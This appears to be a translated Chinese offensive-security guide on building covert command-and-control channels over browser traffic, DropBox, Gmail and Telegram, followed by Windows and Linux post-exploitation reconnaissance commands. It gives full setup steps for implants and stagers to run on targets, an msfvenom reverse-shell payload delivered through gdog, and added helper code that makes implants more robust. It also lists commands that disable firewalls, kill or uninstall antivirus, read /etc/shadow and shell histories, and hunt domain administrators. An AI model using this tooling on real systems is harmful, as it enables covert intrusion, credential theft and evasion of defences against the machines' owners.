Edit the control server IP in /Browser-C2/static/jquery.js

Go back to the top directory and build the server
>go build
Run the built client on the target
Run the listener on the attacker's machine

Traffic between this framework and the target is unencrypted and the feature set is small; it can be used to hand sessions to msf, Cobalt Strike, PoshC2, Empire and similar frameworks.

DropBox C2

>git clone https://github.com/Arno0x/DBC2 dbc2
>cd dbc2
>pip install -r requirements.txt
>chmod +x dropboxC2.py
https://www.dropbox.com/developers/apps/create
After creating the app, generate an access token and put it in config.py

Run it

A password must be set here; it encrypts the traffic with the agents
Publish the agent
>publishStage dbc2_agent.exe
listPublishedStage shows the published agents

Generate a stager
>genStager [tab]    lists the available formats

>genStager oneliner default    PowerShell one-liner

>genStager batch default    .bat format

MSBuild and the other formats work the same way

Here the PowerShell format is run on the target

The attacker's console shows the host checking in

>list    shows the controlled machines

use <id> interacts with a controlled machine

Type ? for the available commands

Gmail C2

Gcat

https://myaccount.google.com/lesssecureapps
启用设置

image

Gmail启用imap

image

将以下脚本转换为exe
# setup.py
from distutils.core import setup
import py2exe

setup(console=['implant.py'])
https://github.com/byt3bl33d3r/gcat
把gcat项目中的implant.py跟以上脚本放在同一目录,修改implant.py中的账户信息

image

>python 1.py py2exe打包
dist目录下生成implant.exe受控机执行
同时也要修改项目中gcat.py中的账户信息

image

在受控机执行implant.exe,如果报错修改email模块以下三行
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.text import MIMEText

image

执行后,邮箱会收到信息

image

使用gcat.py也可以得到当前会话
>python gcat.py -list

image

现在可对其进行控制
>python gcat.py -id [id] -cmd 'net user'

image

A jobid is generated; specifying that jobid retrieves the command output

image

The same output is also present in the mailbox

image

When the target is a Chinese-language system the command output fails to decode; modify the code (decode the output as GBK, as is done for gdog below)

image

Other modules that return output are fixed the same way and then repacked with py2exe.
Supported features: cmd, upload/download, shellcode execution, keylogging, screenshots, etc.

Gdog

https://github.com/maldevel/gdog
More features:
encrypted transport, geolocation, command execution, upload/download, shellcode, screenshots, keylogging, shutdown/reboot, log off user, download from the web, visit websites, etc.
The setup is basically the same and it also has to be packed into an exe, but a few modules must be installed first: PyCrypto, WMI, Enum34, Netifaces
# setup.py
from distutils.core import setup
import py2exe
 
setup(console=['client.py'])
client.py also needs .decode('gbk') added where command output is returned
If client.exe fails with an index-out-of-range error,
search client.py for the string for iface in netifaces.interfaces():
and change the line below it to
if netifaces.ifaddresses(iface)[netifaces.AF_LINK][0]['addr'] == self.MAC and netifaces.AF_INET in netifaces.ifaddresses(iface):
Run it once packed

image image image image

If retrieving a job's output by jobid fails with an encoding error, add (Python 2 only)
reload(sys)
sys.setdefaultencoding("utf-8")
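The Chinese-system decode errors mentioned for gcat above and the decode('gbk') fix for gdog are the same problem: cmd.exe writes its output in the console (OEM) code page, which is cp936/GBK on a zh-CN box, and a str() or utf-8 decode of those bytes throws. The following is an added example, not code from gcat or gdog, showing a decode routine an implant can use so it never crashes on output it cannot decode. The sample bytes are constructed here, not captured from a target; the helper names are this example's own.

```python
import subprocess
import sys


def console_encodings():
    """Encodings to try, most likely first. On Windows the console (OEM) code page is
    what cmd.exe output is actually in: cp936 (GBK) on a zh-CN system, cp437 on en-US."""
    encs = []
    if sys.platform == "win32":
        import ctypes
        encs.append("cp%d" % ctypes.windll.kernel32.GetOEMCP())
    encs += ["utf-8", "gbk", "cp437"]
    ordered = []
    for enc in encs:            # keep order, drop duplicates
        if enc not in ordered:
            ordered.append(enc)
    return ordered


def decode_output(raw, encodings=None):
    """Turn raw command-output bytes into str without ever raising.

    Each encoding is tried strictly; the last one is applied with replacement
    characters so undecodable bytes degrade to U+FFFD instead of crashing the
    implant, which is the failure seen with gcat/gdog on Chinese Windows."""
    encodings = list(encodings or console_encodings())
    for enc in encodings[:-1]:
        try:
            return raw.decode(enc)
        except UnicodeDecodeError:
            continue
    return raw.decode(encodings[-1], errors="replace")


def run_cmd(cmd, encodings=None):
    """Run a shell command and return its combined output as text, the way an
    implant would before mailing it back to the operator."""
    proc = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return decode_output(proc.stdout, encodings)


# Constructed samples (not captured output): the success line cmd.exe prints after
# `net user` on a zh-CN system, as GBK bytes, and its en-US equivalent.
SAMPLE_GBK = "命令成功完成。".encode("gbk")
SAMPLE_ASCII = b"The command completed successfully.\r\n"

if __name__ == "__main__":
    print(decode_output(SAMPLE_GBK, ["utf-8", "gbk"]))
    print(decode_output(SAMPLE_ASCII, ["utf-8", "gbk"]))
    print(run_cmd("echo hello"))
```

Trying utf-8 strictly first is safe here because GBK lead bytes are followed by bytes outside the utf-8 continuation range, so Chinese output fails fast and falls through to gbk; asking the OS for the real OEM code page is still the more reliable choice on the target itself.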
Execute shellcode
>msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform Windows EXITFUNC=thread LPORT=4444 LHOST=x.x.x.x -f python
Strip the quotes and plus signs, keeping only the \xNN shellcode string, and paste it into shell.txt
>python gdog.py -id {id} -exec-shellcode /tmp/shell.txt
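The "strip the quotes and plus signs" step above is easy to get wrong by hand on a few hundred bytes of shellcode. This added example, not part of gdog or msfvenom, parses the `-f python` listing (both the `b"..."` form current msfvenom emits and the older unprefixed form), rebuilds the raw bytes so the count can be checked against msfvenom's reported payload size, and writes the single continuous `\xNN` string the text asks for. The listing embedded below is constructed to have the right shape; it is not a real payload.

```python
import re

# Constructed sample in the shape of `msfvenom ... -f python` output; the bytes are
# illustrative, not a real payload.
SAMPLE_MSFVENOM = '''buf =  b""
buf += b"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b"
buf += b"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14"
'''

# Older msfvenom (Python 2 era) emits "..." without the b prefix; both are accepted.
HEX_RUN = re.compile(r'b?"((?:\\x[0-9a-fA-F]{2})*)"')


def msf_python_to_bytes(listing):
    """Collect every \\xNN escape from the python-format listing into raw bytes."""
    blob = bytearray()
    for run in HEX_RUN.findall(listing):
        blob += bytes.fromhex(run.replace("\\x", ""))
    if not blob:
        raise ValueError("no \\xNN escapes found; was msfvenom run with -f python?")
    return bytes(blob)


def to_shell_txt(shellcode):
    """One continuous \\xNN string with no quotes, plus signs or newlines,
    which is what the text above asks for in shell.txt."""
    return "".join("\\x%02x" % b for b in shellcode)


def write_shell_txt(listing, path="shell.txt"):
    """End-to-end: msfvenom listing in, shell.txt out. Returns the byte count so the
    operator can compare it with msfvenom's 'Payload size' line."""
    sc = msf_python_to_bytes(listing)
    with open(path, "w") as fh:
        fh.write(to_shell_txt(sc))
    return len(sc)


if __name__ == "__main__":
    sc = msf_python_to_bytes(SAMPLE_MSFVENOM)
    print("%d bytes" % len(sc))
    print(to_shell_txt(sc))
```

Pipe the real listing in (`msfvenom ... -f python | python3 -c 'import sys; ...'`) or save it and pass the file contents to write_shell_txt; if the byte count does not match what msfvenom printed, a line was lost in copy-paste.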

Telegram C2

Log in to Telegram
Open https://telegram.me/botfather and send it a message

image

Create a bot

image

Once created, BotFather returns a token
>pip install telepot
>pip install requests
>git clone https://github.com/blazeinfosec/bt2.git
Edit bt2.py
Paste the token and chat_id into the script
How to get the chat_id: send the bot a message from your own account, then open
https://api.telegram.org/bot<token>/getUpdates

image image
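The getUpdates response is a JSON document listing recent updates, and the chat_id to paste into bt2.py is the "id" of the "chat" object inside the message you sent the bot. This added example (not part of bt2) pulls every chat the bot has seen out of such a response and picks the private chat; the response body is constructed in the shape the Bot API returns, not a real capture, and the function names are this example's own.

```python
import json


# Constructed sample in the shape of a Bot API getUpdates response (not a real capture):
# a private chat with the operator, a supergroup, and a channel post.
SAMPLE_GETUPDATES = json.dumps({
    "ok": True,
    "result": [
        {"update_id": 100000001,
         "message": {"message_id": 1, "date": 1500000000,
                     "from": {"id": 123456789, "is_bot": False, "first_name": "Op"},
                     "chat": {"id": 123456789, "type": "private", "first_name": "Op"},
                     "text": "/start"}},
        {"update_id": 100000002,
         "message": {"message_id": 2, "date": 1500000010,
                     "from": {"id": 123456789, "is_bot": False, "first_name": "Op"},
                     "chat": {"id": -1001234567890, "type": "supergroup", "title": "c2-ops"},
                     "text": "hello"}},
        {"update_id": 100000003,
         "channel_post": {"message_id": 5, "date": 1500000020,
                          "chat": {"id": -1009876543210, "type": "channel", "title": "news"},
                          "text": "post"}},
    ],
})


def extract_chats(raw_json):
    """Return (chat_id, chat_type, label) for every chat in a getUpdates body,
    de-duplicated, in order of first appearance."""
    data = json.loads(raw_json)
    if not data.get("ok"):
        raise ValueError("Bot API returned ok=false: %r" % data.get("description"))
    seen = []
    for upd in data.get("result", []):
        # An update carries its message under one of several keys; each has a "chat".
        for key in ("message", "edited_message", "channel_post", "edited_channel_post"):
            msg = upd.get(key)
            if not msg:
                continue
            chat = msg["chat"]
            label = chat.get("title") or chat.get("username") or chat.get("first_name", "")
            entry = (chat["id"], chat["type"], label)
            if entry not in seen:
                seen.append(entry)
    return seen


def private_chat_id(raw_json):
    """The chat_id to paste into bt2.py: the first private chat that messaged the bot."""
    for chat_id, chat_type, _ in extract_chats(raw_json):
        if chat_type == "private":
            return chat_id
    raise LookupError("no private chat yet; message the bot first, then query getUpdates again")


def fetch_updates(token, timeout=10):
    """Live query of the URL given above (network; not used by the offline demo).
    The token is a credential: keep it out of shell history and screenshots."""
    from urllib.request import urlopen
    with urlopen("https://api.telegram.org/bot%s/getUpdates" % token, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


if __name__ == "__main__":
    for chat_id, chat_type, label in extract_chats(SAMPLE_GETUPDATES):
        print("%-16d %-10s %s" % (chat_id, chat_type, label))
    print("chat_id for bt2.py:", private_chat_id(SAMPLE_GETUPDATES))
```

If "result" comes back empty, either nobody has messaged the bot yet or a webhook is set on it (getUpdates and webhooks are mutually exclusive); group and channel ids are negative, which is why the example keeps the sign.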

When a target checks in, the available functions are listed

image image

Windows (C# version)
https://github.com/sf197/Telegra_Csharp_C2

Information gathering

Cmd

>whoami /user  show the current user's SID
>net config Workstation  show this computer's name, logged-on user and domain
>net time /domain  test whether a domain exists
Error 5: a domain exists but the current user is not a domain user
Shows the time: a domain exists and the current user is a domain member
Domain not found: there is no domain
>net view /domain  list domains
>net group "Domain Controllers" /domain  list the domain controllers
>nltest /DCLIST:zone.com  list the domain controllers for zone.com
>net group "domain admins" /domain  list domain administrators
>net group "enterprise admins" /domain  list enterprise administrators
>net localgroup administrators /domain  list the Administrators group on the domain controller
>net group "domain computers" /domain  list the domain's member computers
>net accounts /domain  show the domain password policy
>net user /domain  list domain users
>net view /domain:dc  list the computers in the domain named dc (substitute the domain name)
>netsh firewall set opmode disable/enable  turn the Windows firewall off/on (Windows 2003/XP)
>netsh advfirewall set allprofiles state off/on  the same for versions newer than Windows 2003
>arp -a  show the ARP table
>net start  list running services
>route print  show the routing table
>query user  show logged-on users and their session state
>tasklist /v  list processes with their owning user (look for domain-admin processes)
>dsquery server  query domain controllers
>dsquery computer  query domain computers
>dsquery user  query domain users
>dsquery ou  query organizational units
Export the domain's DNS records; the file is written under C:\Windows\System32\dns\ on the DNS server
>dnscmd /zoneexport zone.com 1.txt
Dump the LDAP directory
>LDIFDE -f c:\windows\temp\dump.ldf -n -m

Wmi

>wmic OS get Caption,CSDVersion,OSArchitecture,Version  OS version
>wmic service list brief  list local services
>wmic process list brief  list processes
>wmic process where name="chrome.exe" get executablepath  path of a process's executable
>wmic process get caption,commandline /value>>1.txt  dump every process's command line to a file
>wmic process where caption="svchost.exe" get caption,commandline /value  command line of one process
Create a process
>wmic process call create calc
>wmic process call create "C:\shell.exe"
>wmic process call create "shutdown.exe -r -f -t 20"
Kill a process
>wmic process where name="shell.exe" call terminate
>wmic process where processid="2345" delete
>wmic process 2345 call terminate
>wmic startup list brief  list autostart programs
>wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List  list registered antivirus products (the SecurityCenter2 namespace exists on workstation editions only, not on Windows Server)
>wmic netuse list brief  list mapped network drives
>wmic ntdomain list brief  domain information, including the domain controller
>wmic useraccount list brief  list local user accounts and their SIDs
>wmic qfe list brief  list installed patches
>wmic share get name,path  list shares
>wmic product get name,version  list installed software (Win32_Product runs an MSI consistency check on every package, so it is slow and writes event-log entries)
>wmic product where "name like '%360%'" get name  find a product's exact name
>wmic product where name="360tray" call uninstall  uninstall a product by exact name
>wmic process where "name like '%360%'" get name  find a process's full name
>wmic process where name="360tray.exe" call terminate  kill that process
>wmic desktop get screensaversecure,screensavertimeout  screen-saver settings

PowerView

Get domain information
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Get-NetDomain}"

image

>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Get-NetForest}"

image

Enumerate the local Administrators group on domain machines
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-EnumerateLocalAdmin}"

image

Find machines where domain administrators are logged on
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-UserHunter}"

image

Find domain machines running processes as a domain administrator (the default target group)
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-ProcessHunter}"

image

Or use the -UserFile and -ComputerFile parameters to look for specific users' processes on specific machines
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-ProcessHunter -UserFile .\user.txt -ComputerFile .\host.txt}"

image

Find shares on domain machines
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-ShareFinder}"

image

List domain computers
>Get-NetComputer -Domain zone.com

image

>Find-LocalAdminAccess -Verbose  find domain machines where the current user has local administrator rights

image

PowerView dev branch
Get the domain controllers and their Windows versions
>Get-DomainController | select name,osversion | fl

Linux

Operating system, kernel version and environment variables
>cat /etc/issue
>cat /etc/*-release
>cat /etc/lsb-release
>cat /etc/redhat-release
>cat /proc/version
>uname -a
>uname -mrs
>rpm -q kernel
>dmesg | grep Linux
>ls /boot | grep vmlinuz-
>cat /etc/profile
>cat /etc/bashrc
>cat ~/.bash_profile
>cat ~/.bashrc
>cat ~/.bash_logout
>env
>set
Processes running as root
>ps aux | grep root
>ps -ef | grep root
Scheduled tasks
>crontab -l
>ls -alh /var/spool/cron
>ls -al /etc/ | grep cron
>ls -al /etc/cron*
>cat /etc/cron*
>cat /etc/at.allow
>cat /etc/at.deny
>cat /etc/cron.allow
>cat /etc/cron.deny
>cat /etc/crontab
>cat /etc/anacrontab
>cat /var/spool/cron/crontabs/root
IP information
>/sbin/ifconfig -a
>cat /etc/network/interfaces
>cat /etc/sysconfig/network
Connections and services
>grep 80 /etc/services
>netstat -antup
>netstat -antpx
>netstat -tulpn
>chkconfig --list
>chkconfig --list | grep 3:on
>last
>w
User information
>id
>whoami
>w
>last
>cat /etc/passwd
>cat /etc/group
>cat /etc/shadow
>ls -alh /var/mail/
>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # list uid-0 (superuser) accounts
>awk -F: '($3 == "0") {print}' /etc/passwd   # list uid-0 (superuser) accounts
>cat /etc/sudoers
>sudo -l
Command history
>cat ~/.bash_history
>cat ~/.nano_history
>cat ~/.atftp_history
>cat ~/.mysql_history
>cat ~/.php_history
Writable directories
>find / -writable -type d 2>/dev/null      # directories writable by the current user
>find / -perm -222 -type d 2>/dev/null     # directories writable by owner, group and others
>find / -perm -o=w -type d 2>/dev/null     # world-writable directories
>find / -perm -o=x -type d 2>/dev/null     # world-executable (searchable) directories
>find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null   # world-writable and world-executable directories